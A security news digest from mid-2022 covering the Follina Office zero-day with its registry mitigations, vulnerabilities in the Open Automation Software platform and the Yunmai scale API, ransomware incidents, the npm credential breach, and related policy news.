Security researchers and Microsoft are warning of a zero-day vulnerability in Office that could allow an attacker to run malicious code on targeted systems. The vulnerability, tracked as CVE-2022-30190, exists in Microsoft Word’s remote templating feature, unlike traditional Office vulnerabilities that rely on macros. If successful, an attacker could load malware onto targeted machines from remote servers while bypassing Microsoft Defender’s anti-virus scanner. This issue affects every version of Microsoft Office currently receive updates, some versions dating back to 2003. Although no patch was available as of Tuesday, Microsoft did publish remediation guidelines to keep the vulnerability from being exploited.
Read more in
- Zero-Day ‘Follina’ Bug Lays Microsoft Office Open to Attack
- Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability
Vulnerabilities in Open Automation Software Platform could lead to information disclosure, denial of service
Cisco Talos recently discovered eight vulnerabilities in the Open Automation Software Platform that could allow an adversary to carry out a variety of malicious actions, including improperly authenticating into the targeted device and causing a denial of service. The OAS Platform facilitates the simplified data transfer between various proprietary devices and applications, including software and hardware. The most serious of these issues is TALOS-2022-1493 (CVE-2022-26082), which an attacker could exploit to gain the ability to execute arbitrary code on the targeted machine. This issue has a severity score of 9.1 out of a possible 10. Another vulnerability, TALOS-2022-1513 (CVE-2022-26833) has a 9.4 severity score and could lead to the unauthenticated use of the REST API.
Read more in
- Vulnerability Spotlight: Vulnerabilities in Open Automation Software Platform could lead to information disclosure, denial of service
Vulnerability: OAS platform vulnerable to critical RCE and API access flaw
Bleeping Computer has featured news of a pair of vulnerabilities in the widely used Open Automation Software (OAS) platform. The OAS platform is a popular data connectivity platform used in industrial control systems, and it allows inter-operation between a wide range of devices and protocols.
The first vulnerability is a critical RCE flaw that could have potentially compromised the whole platform: an API endpoint allowed remote administration of the platform. The researchers discovered that they were able to access the endpoint in question with a blank username and password, allowing arbitrary remote access to the platform. The issue has a CVSS rating of 9.4 and is tracked as CVE-2022-26833. This is an example of API2:2019 — Broken authentication.
The second vulnerability is due to lack of authentication at an API endpoint and relates to a file write vulnerability in the platform’s secure file transfer module. The researchers found that they could send specially crafted requests to an API endpoint that allowed to upload arbitrary files, including a new authorized_keys file in the root user’s SSH directory which in turn allowed full remote access. The issue has a CVSS rating of 9.1 and is tracked as CVE-2022-26082.
The vulnerabilities were disclosed responsibly and have been fixed in version 16.00.0.113, released on 22 May 2022. The researchers recommend either upgrading to the latest version of the platform, or explicitly deactivating the impacted service endpoints.
Vulnerability: Mass account takeover in Yunmai smart scale API
The second vulnerability this week comes from the security team at Fortbridge who discovered a range of vulnerabilities in the API of the Yunmai smart scale.
The researchers performed a penetration test on both Android and iOS versions of the smart scale app and discovered four vulnerabilities relating to the backend API. By combining these vulnerabilities, they successfully executed a mass account takeover. The vulnerabilities were responsibly disclosed to the vendor, but it is unclear if the issues have been resolved at the time of writing.
The first vulnerability allowed attackers to bypass the limit on the number of family members per account. The app only allows creating 16 accounts in a family, but using the API directly did not pose any number limit. The root cause is that the limit was enforced only client side, not in the backend API. This is a common application design flaw — always ensure restrictions and limits are enforced in the backend API.
The second vulnerability allowed arbitrary enumeration of user IDs by guessing IDs using Burp Suite automation. The API did not adequately authorize access to the guessed ID, instead returning full user information, including sensitive PII. This is an example of API1:2019 — Broken object-level authorization — remember to always fully authorize access to objects against the object owner.
The third vulnerability is an example of API2:2019 — Broken authentication, allowing the researchers to add and delete users from other people’s accounts using the ability to enumerate user IDs. Always ensure all API endpoints are authenticated.
The fourth vulnerability allowed the researchers to gain access to both the refresh token and access token when creating new users. By inspecting the response in Burp Suite, the researchers found that these tokens were accidentally leaked as shown:
Armed with this combination of tokens, attackers were effectively granted access to the platform for perpetuity. This is an example of API3:2019 — Excessive data exposure — always be wary of leaking information, particularly access tokens.
For the coup de grace, the researchers were able to combine three of the vulnerabilities to perform mass account takeover attacks using the forgotten password flow.
Clop Ramps Up
The Clop ransomware group suddenly added 21 new victims on their data leak site after being quiet from November through to February.
Universities Put On Watch
The FBI has warned the US education sector that college and university credentials are being offered for sale on criminal marketplaces. University attacks are already fairly common, so we don’t think this alert is all that useful, but perhaps it explains why they are so common.
Arrested REvil Members Will Skate
Russian media reports the prosecution of REvil suspects arrested in January has stalled, with Russian prosecutors not receiving the material they need to press ahead from US law enforcement officials. CyberScoop has English-language coverage, which suggests that this may not indicate broader Russian policy but simply reflects the facts on the ground. Cyber security cooperation just stopped after the invasion of Ukraine. Regardless, we won’t look to Russian law enforcement efforts to solve problems with ransomware.
Indian low-cost airline SpiceJet was affected by an “attempted ransomware attack” that left some passengers stranded for hours including many actually stuck in planes.
The interesting thing is that passengers trapped on planes that can’t take off are tweeting from the runway. They are directly engaging and putting pressure on the company. This is an interesting dynamic that hasn’t been explored in cyber extortion. It opens new perspectives on possible ways to force a company to pay a ransom.
Oh. Great. A new way for ransomware crews to ratchet up the pressure.
A Microsoft Office 0day, which takes advantage of the Microsoft Support Diagnostic Tool (MSDT) is being actively exploited. Microsoft Word’s remote template feature can be used to load HTML, which then calls MSDT to execute Powershell.
Exploitation in the wild dates back to April. This week Proofpoint reported a group linked to Chinese state interests is using it to target the international Tibetan community, and the ACSC says it is being used to target Australian organisations.
Kevin Beaumont has, as usual, been doing a bang-up job collating new information as it comes to light and also keeping Microsoft honest by pointing out its sometimes inconsistent behaviour.
Beaumont notes, for example, that Microsoft initially said the bug was “not a security related issue,” and also managed to recently fix very similar bugs in Teams but not Office. (He dubbed the bug Follina, btw, because the sample he had included the string “0438”, the area code of Follina in Italy.)
Microsoft has issued guidance that recommends disabling the MSDT URL protocol, but a patch is not yet available at the time of writing.
60 million wins
Microsoft has announced plans to apply sensible security defaults to Azure customers who haven’t applied them already. These defaults were introduced for new tenants in October 2019, but previous customers remained unprotected unless they explicitly enabled the features. Some interesting stats: This move will bring MFA to another 60 million accounts, and organisations with these protections experience 80% less compromise than the overall tenant population.
SilverTerrier Head Arrested
On Wednesday, INTERPOL announced the Nigeria Police Force cybercrime unit had arrested a 37-year-old Nigerian man who is alleged to have run a Business Email Compromise gang, dubbed SilverTerrier by Palo Alto Networks. Interpol was assisted by a smattering of cyber security companies, including Palo Alto Networks, Group-IB, and Trend Micro.
A Minister for Cyber Security!
The recently-elected Australian government appointed the Hon Clare O’Neill MP to a new Cabinet-level Minister of Cyber Security position. This is a vast improvement over the previous arrangement where no government minister had “cyber security” in their job title. We do worry, however, about how much bandwidth O’Neill will be able to dedicate to the role as she is also Minister for Home Affairs.
Chinese Open Source is Not that Open
Gitee, a Chinese version of Github, has started to manually review code before it is made publicly available, with the MIT Technology Review reporting the company stating “it didn’t have a choice”. The suspicion, naturally enough, is that Gitee has fallen afoul of the Chinese government’s need to censor information.
These types of companies are strategically important for both companies and countries. Microsoft spent USD$7.5bn to acquire GitHub, and the PRC government is likely concerned about its developer’s dependence on the platform. Making Gitee much harder to use won’t help it grow, though.
Russia orders Google to remove Tor Browser from Russian Play Store
Roskomnadzor, Russia’s telecommunications watchdog, has ordered Google to remove the Tor Browser Android app from the Russian version of the Play Store, the agency said in a message posted on its official Telegram channel on Tuesday.
The agency said that the Tor Browser allows users to access the Tor network, which it had previously ruled that it contains “content prohibited in Russia.”
Yesterday’s decision comes after Roskomnadzor previously ordered Russian internet service providers (ISPs) to block access to the Tor network and its official website in December 2021.
While the Tor Project is currently fighting last year’s ruling in a Moscow court, arguing that the ban was issued without giving Tor representatives an opportunity to participate and hence broke Russian law, the writing is already on the wall.
Coupled with another December 2021 decision to block access to half-a-dozen popular VPN services and with recent rumors that ISPs are testing blocks of several VPN protocols at the lowest level, it is very apparent that Roskomnadzor is on a crusade to limit Russians’ access to censorship-evading tools.
Unless you’ve been living under a rock for the past three months, Roskomnadzor’s actions are driven by the Russian state’s need to control its online space and what information Russians can access online during its illegal and genocide-abundant invasion of Ukraine. Since February 24, when Russian troops officially crossed the border into Ukraine, Roskomnadzor has banned access to foreign news websites that report on the invasion and don’t toe its state-mandated propaganda “denazification” line or websites for western companies that have pulled out of Russia as a sign of protest or because of sanctions.
Roskomnadzor’s decision to go after the Tor Project makes sense since Russia is the country with the second-most users on the Tor network, with more than 300,000 daily users, or 15% of all Tor users; the Tor Project said last year.
Mirror Protocol hack #1
A threat actor exploited a bug in the Mirror Protocol DeFi platform to steal almost $90 million worth of cryptocurrency last year in October 2021. The hack exploited a vulnerability in one of the Mirror Protocol’s smart contract mechanisms that allowed the attacker to generate large sums of cryptocurrency via blockchain betting transactions. The incident went completely undetected for almost seven months until last week, when a Twitter user discovered the vulnerability and its aftermath.
Mirror Protocol hack #2
…and then the same person who found the first attack found a second one.
Portland falls to BEC
The US city of Portland, Oregon, said it lost $1.4 million to a BEC scammer last month, in April 2022. In a press release last week, city officials said they identified that they sent city funds to the wrong bank account after the threat actor attempted to scam the city a second time.
Reuters is reporting on a court case where independent journalist Scott Stedman testified that Israeli jailed private detective Aviram Azari worked to hire Indian hackers to carry out espionage operations on behalf of several Russian oligarchs. Azari pleaded guilty last month to working for BellTroX, a New Delhi-based hacker-for-hire company.
AON, one of the largest providers of insurance, pension administration, and health insurance plans, has disclosed a security breach [PDF]. The company said in February this year, it found that a threat actor accessed some of its servers several times between December 29, 2020, and February 26, 2022, from where it downloaded documents containing sensitive data on some of its customers. AON did not say how many customers had data exposed in the incident.
365 Data Centers lawsuit
365 Data Centers, a major data center operator on the US East Coast, was sued last week by one of its customers after a ransomware attack appears to have permanently destroyed some of its customers’ data. The incident took place on May 14, and the data center operator has yet to publicly acknowledge it besides some private emails sent to its customers. Plaintiffs in the class -ction lawsuit claim they have suffered “damages amounting to hundreds of thousands, if not millions, of dollars in lost revenue and profit.”
Chinese FOSS censorship
Thousands of Chinese developers complained last month that Gitee—a Chinese version of the GitHub platform—has started censoring open-source projects they were hosting on the platform. According to MIT Technology, developers said they had projects locked or hidden from view. Responding to user criticism, Gitee said in a statement posted earlier this month that, going forward, all code posted on the platform will need to be manually reviewed before being published. The company didn’t confirm it was implementing this manual review process at the request of the Chinese government, but let’s face it, who else has the desire and power to force Gitee to do this?
Microsoft launched on Tuesday a new product called Microsoft Entra. According to the company, the Entra product family will include all of Microsoft’s identity and access services, such as Microsoft Azure Active Directory (Azure AD), as well as two new product categories: Cloud Infrastructure Entitlement Management (CIEM) and decentralized identity.
Google has open-sourced PSP, a security protocol that uses cryptography to offload and distribute traffic across multiple servers and which Google has used internally for its intra- and inter-data center traffic. The GitHub repo is here, and below is a Twitter thread from an AWS exec discussing Google’s technical design.
Ukrainian BGP hijack
Qrator Lab, a Russia-based DDoS mitigation provider, disclosed today that Lurenet, a Ukraine-based internet service provider, has hijacked BGP routes for several Russian companies at the start of March, after Russia’s invasion of Ukraine, and in April. The company told Russian news outlet Vedomosti that Lurenet hijacked traffic for Beeline, Megafon, and MTS, three Russian telcos.
Romanian lawmakers have proposed a new bill this week that would make the Romanian Intelligence Service (SRI) the official telecommunications interception agency. The new bill will also grant the agency the right to operate internationally, would force local companies and Romanian citizens to cooperate with its investigations, and introduce special rules for investigating SRI agents.
New HelloXD ransomware
Security researcher MalwareHunter has spotted a new ransomware strain in the wild, named HelloXD, and targeting VMWare ESXi servers.
Android malware ecosystem
According to the ThreatFabric Mobile Threat Landscape for H1 2022, the operators of mobile banking trojans are switching their focus from Account Take-Over (ATO) attacks to adding more On-Device Fraud (ODF) capability to their malware toolkits. Android banking trojans that support ODF features include strains like Alien, Anatsa, Medusa, Hydra, Exo/Octo, Gustuff, and SharkBot.
Interpol reported on Monday that Nigerian law enforcement arrested three locals on charges of cybercrime. Officials said the suspects distributed the Agent Tesla remote access trojan. Once they infected victims, the group would engage in business email compromise (BEC) schemes. Their campaigns primarily targeted corporate organizations, such as oil and gas companies in South East Asia, the Middle East, and North Africa.
The FBI has warned US organizations about a rise in fraudulent schemes seeking donations or other financial assistance related to the crisis in Ukraine. The Bureau says that criminal actors are taking advantage of the war in Ukraine by posing as Ukrainian entities needing humanitarian aid or developing fundraising efforts, including monetary and cryptocurrency donations.
Check Point published a technical report on XLoader, an infostealer malware and the successor of the Formbook malware, abandoned last year.
OALABS has published a report on Amadey Loader, a malware loader botnet that was first seen in 2018 and is currently being advertised on Russian-speaking cybercrime forums.
Security researcher Mohamed Ashraf has published a deep dive into the Mars Stealer malware.
Cybersecurity firm Proofpoint said on Tuesday that it discovered that at least one state-sponsored group has already weaponized the recent Office zero-day that was disclosed over the weekend. Per the company, a threat actor tracked as TA413 (or Keyboy) has used this technique to target individuals in the Tibet region.
Office zero-day mitigation
Finnish security researcher Valtteri Lehtinen released a new tool called UPnProxyChain. The tool creates a network of SOCKS proxy servers out of devices vulnerable to the UPnProxy vulnerability [PDF].
Microsoft Office Zero-Day Vulnerability
A zero-day vulnerability in Microsoft Office can be exploited to allow arbitrary code execution. According to “nao_sec,” the Japanese research team that detected the issue, the flaw “uses Word’s external link to load the HTML and then uses the ‘ms-msdt’ scheme to execute PowerShell code.” The flaw, dubbed Follina, can be exploited even when macros are disabled in Microsoft Word.
- This is a significant vulnerability and underscores problems that likely exist in other protocol handlers (there are many). You can disable troubleshooting tools entirely by entering the following command, which mitigates the current attack:
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\ScriptedDiagnostics" /t REG_DWORD /v EnableDiagnostics /d 0
I’m doing an emergency webcast this Tuesday (today) at 5pm ET to discuss additional mitigations, detections, and just more information about the vulnerability itself. In the meantime, I’ve written a pretty in-depth blog on the topic here (including detection engineering): https://www.scythe.io/library/breaking-follina-msdt-vulnerability
- Microsoft assigned this vulnerability an “important” rating. However, this does not properly reflect the impact this vulnerability may have. Even with current counter measures (for example prompts to enable macros), malicious documents are very commonly used to gain access to networks for ransomware and other malware. This vulnerability bypasses all these protections and all it takes is opening or even just previewing an office document. While reasonable workarounds are available, a push to educate users should be included in your response.
- Practitioner’s note: With no patch available, the ISC offers (among other mitigations) that administrators can remove the
ms-msdt://URI scheme. This lives in
HKEY_CLASSES_ROOT\ms-msdtin the registry and can be removed via Group Policy Object (GPO) or with PowerShell:
Remove-Item -Path Registry::HKEY_CLASSES_ROOT\ms-msdt\ -Recurse -Force
- Microsoft have issued an advisory with some workarounds outlined in it [https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/] The recommendation from Microsoft is to disable the MSDT URL Protocol, however be aware some applications may not work as expected once implemented. However, should this happen you can always re-enable the MSDT URL Protocol on affected computers.
- Word protected mode does kick in to protect you some, but, if you save the malicious document as an RTF it can be executed via the document preview tab in Explorer – bypassing protected mode. The attack appears not to work on the Insider and Current versions of Office; your defense is going to be making sure that your systems running Office are keeping them updated.
Read more in
- New Microsoft Office Attack Vector via “ms-msdt” Protocol Scheme (CVE-2022-30190)
- Follina — a Microsoft Office code execution vulnerability
- Document Exploiting New Microsoft Office Zero-Day Seen in the Wild
- Zero-Day ‘Follina’ Bug Lays Older Microsoft Office Versions Open to Attack
- Microsoft Office: Attackers Injecting Code via Zero-Day Bug
- Watch Out! Researchers Spot New Microsoft Office Zero-Day Exploit in the Wild
- Zero-day vuln in Microsoft Office: ‘Follina’ will work even when macros are disabled
- New Microsoft Office zero-day used in attacks to execute PowerShell
GitHub Details npm Account Information Stolen in April
GitHub says that access credentials for about 100,000 npm accounts were stolen earlier this year. The breach was conducted with the use of stolen OAuth tokens. GitHub initially disclosed the breach in mid-April. Last week, GitHub Senior Director for Product Security Engineering Greg Ose said the intruders stole approximately 100k npm usernames, password hashes, and email addresses from a 2015 archive of user information; all private package manifests and metadata as of April 7, 2021; names and the semVer of published versions of all private packages as of April 10, 2022; and private packages from two organizations.
The investigation into the OAuth compromise found an unrelated exposure: some npm service logs stored in GitHub’s internal logging system contained plaintext credentials received in requests to npm services that should have been sanitized. This kind of “exposure hunting” is a good thing to do regularly, but taking advantage of a breach investigation to do so is a no-brainer.
Plaintext passwords in logs is something we should all be making sure we don’t capture, except for the user who puts their password into the username prompt. Like GitHub, if you discover passwords captured in logs, directly connect to those account holders and have them change the passwords _AFTER_ you make sure that you won’t continue to capture plaintext passwords. This would be a good time to make sure users are enabling MFA. If you’re concerned about your account being among the ones which were captured, change the password and verify 2FA is in place.
Read more in
- GitHub saved plaintext passwords of npm users in log files, post mortem reveals
- GitHub: Attackers stole login details of 100K npm user accounts
Microsoft Rolling Out Security Defaults
Microsoft plans to roll out security defaults to Azure Active Directory users who have not yet enabled security defaults or Azure AD Conditional Access. Microsoft Director of Identity Security Alex Weinert notes that “When we look at hacked accounts, more than 99.9% don’t have MFA.” Microsoft introduced security defaults for new tenants in October 2019. Microsoft estimates the rollout will protect an additional 60 million accounts.
- There are basic security hygiene concepts that ought to be like fluoride in public water – should be the default for all services and should be implemented to be transparent and unalterable to provide a base level of protection. The 2% of use cases that need something different can be handled by exception, vs. put allowing the 98% of use to be put at risk because defaults were left unchanged. The users (even developers) are getting used to accepting this – take advantage.
- There are times when leaving the security to the customer to (finally) implement is as good as never implementing them. All service providers need to not only continue to raise the security bar commensurate with the current threat landscape, but also, ensure customers are notified and implement those improvements. Microsoft’s conditional access allows you to have different security settings for trusted and untrusted devices and networks. You can enable the security defaults on your Microsoft 365 admin center.
Read more in
- Raising the Baseline Security for all Organizations in the World
- Microsoft to roll out security defaults to millions more worldwide
- Microsoft is rolling out these security settings to protect millions of accounts. Here’s what’s changing
Commerce Publishes Final Rule on Cybersecurity Tools Export Controls
The US Department of Commerce’s Bureau of Industry and Security has published a final cybersecurity export control rule in the Federal Register. The new rule is aimed at preventing the resale or export of certain cybersecurity tools to countries like Russia and China without a license. The rule took effect on May 26, 2022.
- This aligns the US with the other 42 members of the Wassenaar Arrangement on Export Controls for Conventional Arms and Dual-Use Goods and Technologies. The latest revisions incorporated feedback provided to the October 2021 proposed final ruling. Essentially items under this rule must have proper licensing through the Department of Commerce before they can be used outside the country.
- This is mostly of interest to vendors selling products, but if you are using any of the tools on the list, worth checking to see if any potential spillover impact on your company’s global use of such products.
Read more in
- Information Security Controls: Cybersecurity Items
- Commerce Dept. Issues Rule to Restrict Cyber Hacking Tools
FBI Warns Criminals are Selling University Credentials
The FBI has published a TLP: White level Private Industry Notification warning that network access credentials for US colleges and universities are being sold in online criminal marketplaces. The FBI recommends that academic institutions take steps to improve their networks’ security, including keeping software up to date, implementing lockout rules for multiple password attempts, and requiring multi-factor authentication.
- While university network and student support services can be challenging, the recommended actions are doable. Make sure that you are segmenting; particularly research and back-end IT, monitoring, and aware of services exposed to the Internet. Seriously block SMB, RDP, FTP and other insecure protocols. Be aware of trust relationships, establish a process for these connections as well as verifying they remain appropriately secure. When looking at MFA, look to phishing resistant options.
- If you have any collaborative agreements with universities with VPN access involved, good idea to investigate impact.
Read more in
- Compromised US Academic Credentials Identified Across Various Public and Dark Web Forums (PDF)
- FBI warns colleges VPN credentials circulating on Russian forums
- FBI Warns About Hackers Selling VPN Credentials for U.S. College Networks
Talos List of Open Automation Software Vulnerabilities
Researchers from Cisco Talos recently discovered eight vulnerabilities in the Open Automation Software (OAS) Platform. The flaws could be exploited to execute arbitrary code, allow unauthenticated use of the REST API, and conduct other malicious activity. OAS has released an update to address the vulnerabilities.
- OAS is often used for data transfer in OT/ICS and IIoT environments. The flaws have CVE scores in the 9.1-9.4 range, can be used to conduct DOS attacks or even enumerate username/password pairs, RCE and other mischief. If you’ve got it in your environment, make sure you apply the update. If it’s bundled with a larger package, get your vendor’s update plans. Also make sure that you’re following hardening guidelines, particularly segmentation and monitoring of connections to administration services and ports.
Read more in
- Vulnerability Spotlight: Vulnerabilities in Open Automation Software Platform could lead to information disclosure, denial of service
- Talos names eight deadly sins in widely used industrial software
- Critical OAS Bugs Open Industrial Systems to Takeover
- Critical Flaws in Popular ICS Platform Can Trigger RCE
Italy’s CSIRT Warns of Potential DDoS Attacks
An alert from Italy’s Computer Security Incident Response Team (CSIRT) warns that there is a high risk of distributed denial-of-service (DDoS) attacks on national computer systems. The alert notes that “There continue to be signs and threats of possible imminent attacks against, in particular, national public entities, private entities providing a public utility service or private entities whose image is identified with the country of Italy.”
- “ChromeLoader” uses PowerShell on Windows, and a Bash script on the Mac and is distributed via an ISO claiming to be a hacked game image. The loader is used to install a browser plugin. Consider blocking or otherwise limiting use of ISO’s downloaded from the Internet.
Read more in
More Pushback Against CERT-In Breach Reporting Requirements
Nearly a dozen technology-related lobby groups have written to India’s Computer Emergency Response Team (CERT-In) to voice their objection to the organization’s new breach reporting requirements. The groups include the US Chamber of Commerce, The Alliance (BSA), Digital Europe, the Information Technology Industry Council, techUK, the Cybersecurity Coalition US Chamber of Commerce, the US-India Business Council, and the US-India Strategic Partnership Forum. The groups object to numerous requirements , including the six-hour breach reporting rule and the burden and risk of storing customer data.
- The objections highlight important factors to consider when implementing incident reporting, make sure the reporting requirement is obtainable, understand how data is protected, as well as what data is required, some of which may necessitate updated NDAs. Also ensure that you can use machine-based reporting tools which allow you to leverage existing systems and processes.